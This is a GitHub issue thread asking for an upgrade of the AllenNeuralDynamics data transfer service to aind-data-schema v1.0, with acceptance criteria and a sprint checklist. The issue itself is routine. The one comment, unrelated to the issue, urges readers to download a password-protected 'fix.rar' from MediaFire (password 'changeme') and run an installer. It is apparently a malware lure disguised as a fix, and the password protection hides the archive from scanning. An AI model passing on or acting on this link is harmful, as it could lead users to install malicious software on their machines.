### ISSUE TITLE
Upgrade to use aind-data-schema v1.0

### ISSUE THREAD

**Issue by jtyoung84** [AllenNeuralDynamics/aind-data-transfer-service#137]
# User story
As a user, I want to use the latest aind-data-schema version, so I can attach the latest metadata to data assets on upload.

# Acceptance criteria
- [ ] Update versions of aind-data-schema and aind-data-transfer-models
- [ ] Update unit tests appropriately

# Sprint Ready Checklist 
- [ ] 1. Acceptance criteria defined 
- [ ] 2. Team understands acceptance criteria 
- [ ] 3. Team has defined solution / steps to satisfy acceptance criteria 
- [ ] 4. Acceptance criteria is verifiable / testable 
- [ ] 5. External / 3rd Party dependencies identified
- [ ] 6. Ticket is prioritized and sized

# Notes
Depends on https://github.com/AllenNeuralDynamics/aind-data-transfer-models/issues/27 being completed first

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
